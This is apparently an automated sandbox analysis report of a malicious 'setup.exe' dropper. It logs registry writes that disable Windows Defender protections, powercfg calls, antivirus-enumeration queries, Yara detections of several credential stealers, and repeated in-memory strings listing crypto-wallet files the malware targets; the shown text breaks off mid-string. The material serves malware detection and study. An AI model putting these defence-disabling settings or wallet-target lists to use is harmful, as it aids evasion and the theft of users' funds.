Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe

Code function: 7_2_006B3486 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

7_2_006B3486

Source: C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe

Code function: 8_2_00405C44 GetVersionExA,

8_2_00405C44

Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender real time protection (registry)

Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{929E38D7-F85C-4E9F-9205-1838BD20B49A}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions	Registry value created: Exclusions_Extensions 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{929E38D7-F85C-4E9F-9205-1838BD20B49A}Machine\SOFTWARE\Policies\Microsoft\Windows Defender	Registry value created: DisableAntiSpyware 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{929E38D7-F85C-4E9F-9205-1838BD20B49A}Machine\SOFTWARE\Policies\Microsoft\Windows Defender	Registry value created: DisableRoutinelyTakingAction 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{929E38D7-F85C-4E9F-9205-1838BD20B49A}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableBehaviorMonitoring 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{929E38D7-F85C-4E9F-9205-1838BD20B49A}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableOnAccessProtection 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{929E38D7-F85C-4E9F-9205-1838BD20B49A}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableScanOnRealtimeEnable 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{929E38D7-F85C-4E9F-9205-1838BD20B49A}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{929E38D7-F85C-4E9F-9205-1838BD20B49A}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{929E38D7-F85C-4E9F-9205-1838BD20B49A}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRawWriteNotification 1	Jump to behavior

Exclude list of file types from scheduled, custom, and real-time scanning

Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe

Registry value created: Exclusions_Extensions 1

Jump to behavior

Modifies Group Policy settings

Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe

File written: C:\Windows\System32\GroupPolicy\gpt.ini

Jump to behavior

Modifies power options to not sleep / hibernate

Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\System32\sc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Mars stealer

Source: Yara match	File source: 9.2.Lbg6Jgx2PuK0JimgGIFCI5UU.exe.a00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2606301405.0000000000A01000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 0.3.1719859269.0326595_setup.exe.21663cfc420.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.1719859269.0326595_setup.exe.21663d50aa0.19.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.1719859269.0326595_setup.exe.21663d50aa0.22.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3ac5990.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3ac5990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.1719859269.0326595_setup.exe.21663d7f760.30.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.1719859269.0326595_setup.exe.21663d7f760.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.1719859269.0326595_setup.exe.21663d1e060.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3b9edf8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3b9edf8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.b80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2231437346.0000021664602000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2446122918.0000000003AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2396195188.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2242900895.0000021665139000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.2313037451.0000000000B82000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newsoftgnu[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.4Q6k8SlqG7M24bYO3UgMWICf.exe.73ab00.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.4Q6k8SlqG7M24bYO3UgMWICf.exe.6a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.4Q6k8SlqG7M24bYO3UgMWICf.exe.73ab00.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2550868156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2414041774.000000000073A000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000009.00000002.2627954517.0000000001CF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Lbg6Jgx2PuK0JimgGIFCI5UU.exe PID: 6256, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.4314a88.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.4314a88.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Lbg6Jgx2PuK0JimgGIFCI5UU.exe.a00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.437bed8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.437bed8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2606301405.0000000000A01000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2451450016.0000000004314000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2806277052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2421723577.000000000338B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2451450016.000000000437B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2451450016.00000000042E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2451450016.00000000043AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Lbg6Jgx2PuK0JimgGIFCI5UU.exe PID: 6256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yHP2Z5SFUIZjI8pAKB_H3QUP.exe PID: 2876, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 27.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3ac5990.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3ac5990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3b9edf8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3b9edf8.2.raw.unpack, type: UNPACKEDPE

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi 